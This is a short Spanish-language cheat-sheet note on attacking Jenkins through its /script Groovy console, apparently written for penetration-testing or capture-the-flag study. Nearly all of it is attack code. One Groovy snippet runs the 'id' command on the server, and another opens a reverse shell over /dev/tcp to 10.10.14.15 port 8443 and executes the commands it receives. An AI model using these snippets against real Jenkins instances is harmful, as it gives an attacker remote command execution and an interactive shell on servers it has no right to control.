Attacking Jenkins

Comandos

• Para realizar un ataque de inyección de comandos tenemos que ir a /script.
  • Acepta Groovy script
• Ejemplo:

  def cmd = 'id'
  def sout = new StringBuffer(), serr = new StringBuffer()
  def proc = cmd.execute()
  proc.consumeProcessOutput(sout, serr)
  proc.waitForOrKill(1000)
  println sout
  

Otro ejemplo

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()